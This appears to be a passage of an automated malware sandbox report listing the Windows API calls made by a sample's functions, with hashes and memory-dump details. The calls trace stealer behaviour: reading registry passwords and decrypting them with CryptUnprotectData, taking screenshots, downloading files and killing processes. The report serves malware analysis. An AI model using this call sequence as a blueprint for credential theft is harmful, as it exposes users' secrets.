                              • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                              • String ID: <
                              • API String ID: 3579039295-4251816714
                              • Opcode ID: 3d1b5aa74f86c09e6e855ea7c0cb4a8402cdf5472d309fd99dd532153b008fc8
                              • Instruction ID: 3d10166f1b94c08374f3a3547ff5905e778951e96cde0bbbb751c0461c06f69a
                              • Opcode Fuzzy Hash: 3d1b5aa74f86c09e6e855ea7c0cb4a8402cdf5472d309fd99dd532153b008fc8
                              • Instruction Fuzzy Hash: 7151A370A15259EBDB11DFA4DDC8ADEB7F9AF44300F444126E909E7351DB34AE02DB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CEFE4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CF012
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007CF026
                              • lstrlen.KERNEL32(00000000), ref: 007CF035
                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 007CF053
                              • StrStrA.SHLWAPI(00000000,?), ref: 007CF081
                              • lstrlen.KERNEL32(?), ref: 007CF094
                              • lstrlen.KERNEL32(00000000), ref: 007CF0B2
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 007CF0FF
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 007CF13F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$AllocLocal
                              • String ID: ERROR
                              • API String ID: 1803462166-2861137601
                              • Opcode ID: 08c00b9823c83c237995ccaf60e4182fc94beab8b6997bb24687139a45e095e2
                              • Instruction ID: 1e369a43be0949bc8071db56e19346749e10e4528698359f3445da2650939e40
                              • Opcode Fuzzy Hash: 08c00b9823c83c237995ccaf60e4182fc94beab8b6997bb24687139a45e095e2
                              • Instruction Fuzzy Hash: ED518E31915145DFCB21AF74DC89FAE77A6AF54710F09856DFC4AAB213DA38DC028B90
                              APIs
                              • GetEnvironmentVariableA.KERNEL32(014589C8,009E9BD8,0000FFFF), ref: 007BA026
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BA053
                              • lstrlen.KERNEL32(009E9BD8), ref: 007BA060
                              • lstrcpy.KERNEL32(00000000,009E9BD8), ref: 007BA08A
                              • lstrlen.KERNEL32(007E4C4C), ref: 007BA095
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BA0B2
                              • lstrcat.KERNEL32(00000000,007E4C4C), ref: 007BA0BE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BA0E4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BA0EF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BA114
                              • SetEnvironmentVariableA.KERNEL32(014589C8,00000000), ref: 007BA12F
                              • LoadLibraryA.KERNEL32(0145D2C0), ref: 007BA143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                              • String ID:
                              • API String ID: 2929475105-0
                              • Opcode ID: 2fdf67deaa90868ac71e70037d322c5b46a6e789f662e9c92902a06ef1d9f311
                              • Instruction ID: c2da01ade34aafe01c4141d2ae5f7b117ad366eca5f0a7c70cc5e0e88acea66e
                              • Opcode Fuzzy Hash: 2fdf67deaa90868ac71e70037d322c5b46a6e789f662e9c92902a06ef1d9f311
                              • Instruction Fuzzy Hash: 6691B131A14644AFD731BFA8DC88BE737B6BB94704F404458E8099B262EF79DC41DB92
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CC8A2
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CC8D1
                              • lstrlen.KERNEL32(00000000), ref: 007CC8FC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CC932
                              • StrCmpCA.SHLWAPI(00000000,007E4C3C), ref: 007CC943
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: dcc11f79e9d1bce15a5bc9766ee88a8627b46aef5ca7bb3d828b1915efc21865
                              • Instruction ID: 038fa88c8b16ceab41b2afdca3fad1dd9d8e9dec986e2406f16746618f2c69e6
                              • Opcode Fuzzy Hash: dcc11f79e9d1bce15a5bc9766ee88a8627b46aef5ca7bb3d828b1915efc21865
                              • Instruction Fuzzy Hash: F2619271D152199BDB12DFB58889FEE7BF8AF05300F04816DE849E7242D73C9D028BA0
                              APIs
                              • memset.MSVCRT ref: 007D451A
                              • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,007C4F39), ref: 007D4545
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D454C
                              • wsprintfW.USER32 ref: 007D455B
                              • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 007D45CA
                              • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 007D45D9
                              • CloseHandle.KERNEL32(00000000,?,?), ref: 007D45E0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID: 9O|$%hs$9O|
                              • API String ID: 3729781310-725078639
                              • Opcode ID: 0cc43e1ff6869071e8d621a152d5b1de95e1486d7e3643047a8f04a156b0d408
                              • Instruction ID: dd015c153a431638cdd7ae57e1cc3be9f8bbab6520073ad43e9e879d2ebcc8a2
                              • Opcode Fuzzy Hash: 0cc43e1ff6869071e8d621a152d5b1de95e1486d7e3643047a8f04a156b0d408
                              • Instruction Fuzzy Hash: D1317371A14245BBDB20DBE4DC89FDE7778FF44701F104455FA06EB280EB746A418BA5
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,007D0CF0), ref: 007D4276
                              • GetDesktopWindow.USER32 ref: 007D4280
                              • GetWindowRect.USER32(00000000,?), ref: 007D428D
                              • SelectObject.GDI32(00000000,00000000), ref: 007D42BF
                              • GetHGlobalFromStream.COMBASE(007D0CF0,?), ref: 007D4336
                              • GlobalLock.KERNEL32(?), ref: 007D4340
                              • GlobalSize.KERNEL32(?), ref: 007D434D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                              • String ID:
                              • API String ID: 1264946473-0
                              • Opcode ID: d37a54c265e3f06402f321978c079f8359da11773c7097928b81a3b7ec0343c8
                              • Instruction ID: d2af3d2a78f60748cfa9bdff36fa463f815a428435e2bbd152a563e0c45f7278
                              • Opcode Fuzzy Hash: d37a54c265e3f06402f321978c079f8359da11773c7097928b81a3b7ec0343c8
                              • Instruction Fuzzy Hash: E6513D75A20209EFDB10DFA4DC89AEEB7B9EF48311F104519F905B7251DB34AE01DBA0
                              APIs
                              • lstrcat.KERNEL32(?,0145DEB8), ref: 007CE00D
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007CE037
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE06F
                              • lstrcat.KERNEL32(?,00000000), ref: 007CE07D
                              • lstrcat.KERNEL32(?,?), ref: 007CE098
                              • lstrcat.KERNEL32(?,?), ref: 007CE0AC
                              • lstrcat.KERNEL32(?,0144B2B0), ref: 007CE0C0
                              • lstrcat.KERNEL32(?,?), ref: 007CE0D4
                              • lstrcat.KERNEL32(?,0145D1C0), ref: 007CE0E7
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE11F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007CE126
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 4230089145-0
                              • Opcode ID: 766e3c98943cd41f65a513acea89f24946f46386d63282feb1c46f8bcf2dae5c
                              • Instruction ID: 71e616b6da44e950730e6d9263cf792589d997291161335edf7568d5a5a555f0
                              • Opcode Fuzzy Hash: 766e3c98943cd41f65a513acea89f24946f46386d63282feb1c46f8bcf2dae5c
                              • Instruction Fuzzy Hash: F461B17191111CEBCB55DF64CC88BDD73B4BF88300F5089A8AA0AA7251DB749F859F90
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B6AFF
                              • InternetOpenA.WININET(007DCFEC,00000001,00000000,00000000,00000000), ref: 007B6B2C
                              • StrCmpCA.SHLWAPI(?,0145E360), ref: 007B6B4A
                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 007B6B6A
                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007B6B88
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 007B6BA1
                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 007B6BC6
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 007B6BF0
                              • CloseHandle.KERNEL32(00000000), ref: 007B6C10
                              • InternetCloseHandle.WININET(00000000), ref: 007B6C17
                              • InternetCloseHandle.WININET(?), ref: 007B6C21
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                              • String ID:
                              • API String ID: 2500263513-0
                              • Opcode ID: febc4880f6b0af0e2db411917cb2f609e9c01b9b794fd54cf5e3b40ad76d6069
                              • Instruction ID: 7763aa7d0c1f79035aa9460563efa9f3d52e6fd614190d4d4a2312a46861f0e3
                              • Opcode Fuzzy Hash: febc4880f6b0af0e2db411917cb2f609e9c01b9b794fd54cf5e3b40ad76d6069
                              • Instruction Fuzzy Hash: DB416FB1610205ABDB20DFA4DC89FEF77B9EB04701F104554FA05EB280EF78AD419BA4
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BBC1F
                              • lstrlen.KERNEL32(00000000), ref: 007BBC52
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BBC7C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BBC84
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BBCAC
                              • lstrlen.KERNEL32(007E4AD4), ref: 007BBD23
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: b29dbba1cd7264dec0a878fd64109a36246d4847a9cdda2470cd8b579d29f255
                              • Instruction ID: d6f3ae4094aff1ea3d073dc052602382d864f9cbc14156165462198ef5d240d8
                              • Opcode Fuzzy Hash: b29dbba1cd7264dec0a878fd64109a36246d4847a9cdda2470cd8b579d29f255
                              • Instruction Fuzzy Hash: 20A13F30615205CFCB25DF68D989BEEB7B5AF44305F188469E80AEB362DB79DC42CB50
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007D5F2A
                              • std::_Xinvalid_argument.LIBCPMT ref: 007D5F49
                              • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 007D6014
                              • memmove.MSVCRT(00000000,00000000,?), ref: 007D609F
                              • std::_Xinvalid_argument.LIBCPMT ref: 007D60D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$memmove
                              • String ID: invalid string position$string too long
                              • API String ID: 1975243496-4289949731
                              • Opcode ID: ef587f7ab07264e00dd1f5b06cbf00b8918cb6aecc43bdd9a79fb9e3bacf8049
                              • Instruction ID: 2b48ce3021fecf07fae4928f9ab69ba1f1aa79f7c8446b71c2eaedc357bd86ab
                              • Opcode Fuzzy Hash: ef587f7ab07264e00dd1f5b06cbf00b8918cb6aecc43bdd9a79fb9e3bacf8049
                              • Instruction Fuzzy Hash: E8617F70B00544DBDB18CF5CC8D5D6EB7B6EF84304B284A5AE4928B782E739ED80CB95
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE06F
                              • lstrcat.KERNEL32(?,00000000), ref: 007CE07D
                              • lstrcat.KERNEL32(?,?), ref: 007CE098
                              • lstrcat.KERNEL32(?,?), ref: 007CE0AC
                              • lstrcat.KERNEL32(?,0144B2B0), ref: 007CE0C0
                              • lstrcat.KERNEL32(?,?), ref: 007CE0D4
                              • lstrcat.KERNEL32(?,0145D1C0), ref: 007CE0E7
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE11F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007CE126
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFile
                              • String ID:
                              • API String ID: 3428472996-0
                              • Opcode ID: 16119ad5b235406b57e7fd83ede423a3f7bd7428220960cc16d414f59570424f
                              • Instruction ID: 6f99d44bf7c154154a71f04facf82c16213456407638c7f5a0986c3bcaa53ee7
                              • Opcode Fuzzy Hash: 16119ad5b235406b57e7fd83ede423a3f7bd7428220960cc16d414f59570424f
                              • Instruction Fuzzy Hash: D3418B7192111CDBCB25EF64DC88BDD73B4BF48300F5489A8B90AA7251DB389F868F90
                              APIs
                                • Part of subcall function 007B77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007B7805
                                • Part of subcall function 007B77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 007B784A
                                • Part of subcall function 007B77D0: StrStrA.SHLWAPI(?,Password), ref: 007B78B8
                                • Part of subcall function 007B77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B78EC
                                • Part of subcall function 007B77D0: HeapFree.KERNEL32(00000000), ref: 007B78F3
                              • lstrcat.KERNEL32(00000000,007E4AD4), ref: 007B7A90
                              • lstrcat.KERNEL32(00000000,?), ref: 007B7ABD
                              • lstrcat.KERNEL32(00000000, : ), ref: 007B7ACF
                              • lstrcat.KERNEL32(00000000,?), ref: 007B7AF0
                              • wsprintfA.USER32 ref: 007B7B10
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B7B39
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B7B47
                              • lstrcat.KERNEL32(00000000,007E4AD4), ref: 007B7B60
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                              • String ID: :
                              • API String ID: 398153587-3653984579
                              • Opcode ID: 6c56654342c0d67cc87ab51e175deab964994a48c26df411c64f51e9d62c7c83
                              • Instruction ID: a6203fe077ed7093c3409f5413883868ee8f7af3902b8508c737b3ebf9c52772
                              • Opcode Fuzzy Hash: 6c56654342c0d67cc87ab51e175deab964994a48c26df411c64f51e9d62c7c83
                              • Instruction Fuzzy Hash: 3431B7B2918154DFCB14DBA8DC84AEFB779EBC8715B14451DE509A7200DB78ED01EB90
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 007C820C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C8243
                              • lstrlen.KERNEL32(00000000), ref: 007C8260
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C8297
                              • lstrlen.KERNEL32(00000000), ref: 007C82B4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C82EB
                              • lstrlen.KERNEL32(00000000), ref: 007C8308
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C8337
                              • lstrlen.KERNEL32(00000000), ref: 007C8351
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C8380
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: abc966bec2bc05da09c03270c20686b09fbfdcd0dc98dff500b0f94acca1099e
                              • Instruction ID: b924ca2cd4de22c14bd26cca2b807fa8fd58f60c3de0514be56873fcf9e7b9f2
                              • Opcode Fuzzy Hash: abc966bec2bc05da09c03270c20686b09fbfdcd0dc98dff500b0f94acca1099e
                              • Instruction Fuzzy Hash: DF516C71901602DBEB54DF78D898BAEB7A8EF44700F114518AD06EB245EB38ED51CBE1
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007B7805
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 007B784A
                              • StrStrA.SHLWAPI(?,Password), ref: 007B78B8
                                • Part of subcall function 007B7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 007B775E
                                • Part of subcall function 007B7750: RtlAllocateHeap.NTDLL(00000000), ref: 007B7765
                                • Part of subcall function 007B7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007B778D
                                • Part of subcall function 007B7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 007B77AD
                                • Part of subcall function 007B7750: LocalFree.KERNEL32(?), ref: 007B77B7
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B78EC
                              • HeapFree.KERNEL32(00000000), ref: 007B78F3
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 007B7A35
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                              • String ID: Password
                              • API String ID: 356768136-3434357891
